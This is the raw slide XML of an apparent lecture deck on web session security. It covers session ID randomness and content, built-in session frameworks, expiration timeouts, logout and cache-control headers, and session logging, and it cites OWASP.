                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>more entropy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The session ID must be unpredictable (random enough) to prevent guessing attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A good PRNG (Pseudo Random Number Generator) must be used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The session ID value must provide at least 64 bits of entropy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1850344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Meaningless session id content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="8153400" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The session ID content (or value) must be meaningless to prevent information disclosure attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacker may  be able to decode the contents of the ID and extract details of the user, the session, or the inner workings of the web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The session ID must simply be an identifier on the client side, and its value must never include sensitive information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IP address, User-Agent, e-mail, username, user ID, role, privilege level, access rights, language preferences, account ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the session objects and properties contain sensitive information, such as credit card numbers, it is required to duly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encrypt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and protect the session management repository. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is recommended to create </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cryptographically strong session IDs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>through the usage of cryptographic hash functions such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SHA1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (160 bits).</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="93784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Built-in session management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="8153400" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Most development frameworks (J2EE, ASP .NET, PHP) provide their own session management features and associated implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Use these </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>built-in frameworks </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>versus building a home made one from scratch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The storage capabilities used by the session management mechanism to temporarily save the session IDs must be secure, protecting the session IDs against local or remote accidental disclosure or unauthorized access</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3237111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Session Expiration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1066800"/>
            <a:ext cx="8153400" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>To minimize the time period an attacker can launch attacks over active sessions, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>expiration timeouts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>for session can be established</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The session expiration timeout values must balance security and usability so that the user can complete the operations within the web application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Common timeouts ranges are 2-5 minutes for high-value applications and 15- 30 minutes for low risk applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>When a session expires, the application take active actions to invalidate the session on both sides, client and server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Client side actions to invalidate the session ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Empty the session ID value, and set the “Expires” (or “Max-Age”) attribute to a date from the past </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Set-Cookie: id=; Expires=Friday, 17-May-03 18:45:00 GMT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1144850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Logout button and content caching</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="8153400" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Logout Button:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Web applications must provide a visible an easily accessible logout button that is available from every page, so user can manually close the session at any time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Content Caching</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>: Even after the session has been closed, it might be possible to access the session data through the web browser cache</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web applications must use restrictive cache directives for HTTP and HTTPS to avoid caching </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Cache-Control: no-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cache,no</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-store” and “Pragma: no-cache”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> HTTP headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If caching is allowed, session IDs must never be cached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“Cache-Control: no-cache="Set-Cookie, Set-Cookie2"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> directive to allow web clients to cache everything except the session ID.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="491355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458200" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Defense technique: Logging Sessions Life Cycle</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1371600"/>
            <a:ext cx="8153400" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web applications should log information regarding the full life cycle of sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Record session creation, renewal, and destruction of session IDs, as well as details about its usage within login and logout operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The log details might include a timestamp, source IP address, web target resource requested, HTTP headers (User-Agent and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>), GET and POST parameters, etc. to associate a session with other information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="239642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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="0"/>
            <a:ext cx="7239000" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1066800"/>
            <a:ext cx="8316686" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>1. Z. Evans and H. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Shahriar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, "Web Session Security: Attacks and Mitigation Techniques," Case Studies in Secure Computing - Achievements and Trends, Editors: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Biju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Issac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Nauman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>Israr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, CRC Press, Taylor and Francis, 2014.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>2. OWASP,  https://www.owasp.org/index.php/Session_Management_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="258344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199" y="0"/>
            <a:ext cx="8466083" cy="762000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0"/>
              <a:t>An overview of session in web application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7172" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3657600"/>
            <a:ext cx="8305800" cy="2590800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>An application is supposed to address all these stages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Need to implement session management capabilities that link the authentication and access control (authorization)</a:t>
            </a:r>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71600"/>
            <a:ext cx="7419975"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0970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What is a web session?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25605" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="998483"/>
            <a:ext cx="8305800" cy="4792717"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A web session is usually a token (random identifier)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Generated at the server-side and sent to the client-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Token is known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>session id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>at the server side and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> at the client side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Any communication between the server and client must include a session or cookie to relate a user context </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Usage of a web session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Establishing and monitoring the privilege of a user for accessing data and functionalities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Keeping track of preference information (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>language preference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>for a user who has not logged in but visiting pages as an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>anonymous user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="616817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Web session establishment scenarios</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25605" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="998483"/>
            <a:ext cx="8305800" cy="4792717"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A user requests a web page from browser for the first time, the server side generates a random token (no authentication)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If a user provides credential information for authentication, the server side upon successful authentication generates a new session ID or keeps the same session ID supplied before</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A user is active as long as the session ID remains valid</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The session ID might have a valid period set by the server side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The client side receives the session ID information in the form of a cookie (a special HTTP header sent by the server side) having specific expiration date and time and domain name of the server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="410499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with cookie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2406" y="914400"/>
            <a:ext cx="4920343"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64" y="2380397"/>
            <a:ext cx="829887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406" y="4682318"/>
            <a:ext cx="5446594" cy="171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329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Example of session establishment at server side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1645612421"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1371600" y="1066800"/>
          <a:ext cx="6629399" cy="1780032"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6629399">
                  <a:extLst>
